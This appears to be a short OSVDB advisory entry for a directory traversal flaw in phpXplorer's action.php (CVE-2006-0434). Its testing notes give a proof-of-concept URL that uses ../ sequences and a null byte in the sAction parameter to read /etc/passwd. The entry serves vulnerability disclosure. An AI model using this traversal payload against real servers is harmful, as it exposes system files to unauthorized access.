phpXplorer action.php sAction Variable Traversal Arbitrary File Access

2006-01-18T00:03:11
ID OSVDB:23658
Type osvdb
Reporter OSVDB
Modified 2006-01-18T00:03:11

Description

Manual Testing Notes

http://[target]/phpXplorer/system/action.php?sShare=guest&sAction=../../../../../../../../../../../../etc/passwd%00

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-01/0357.html CVE-2006-0434